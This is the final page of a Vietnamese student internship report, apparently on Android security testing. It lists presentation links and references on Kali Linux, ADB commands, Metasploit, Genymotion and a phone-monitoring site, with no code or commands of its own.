- Link slideshare: http://www.slideshare.net/tuankiet123/bai-bao-cao-4
- Link youtube: https://www.youtube.com/watch?v=ieTT4D04cao
Báo cáo giữa kì:
- Link slideshare: http://www.slideshare.net/tuankiet123/bo-co-gia-k-38036034
Giới thiệu bản thân:
- Link youtube: https://www.youtube.com/watch?v=v8VvL3RCAKY
Thuận lợi – khó khăn:
- Link youtube: https://www.youtube.com/watch?v=XQsUt8uZ1pU
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 88
10. Các link tham khảo
- Tài liệu của Trung tâm Athena
- http://athena.edu.vn/
- http://whitehat.vn/threads/4983-Huong-dan-cai-dat-Kali-linux-backtrack-6.html
- http://www.techrum.vn/threads/huong-dan-su-dung-cac-lenh-adb-co-ban-cua-
android.1202/#.U-7PQ2NEGnF
- http://www.differencebetween.info/difference-between-android-2.3-and-android-4.0
- http://vi.wikipedia.org/wiki/Android
- http://en.wikipedia.org/wiki/Android_version_history
- http://www.quantrimang.com.vn/metasploit-cong-cu-khai-thac-lo-hong-14147
- http://vietbao.vn/Cong-nghe/Huong-dan-cai-dat-phan-mem-Genymotion-gia-lap-he-dieu-
hanh-Android-tot-nhat/2131795280/229/
- http://hellospy.com/homepage.aspx?lang=en-US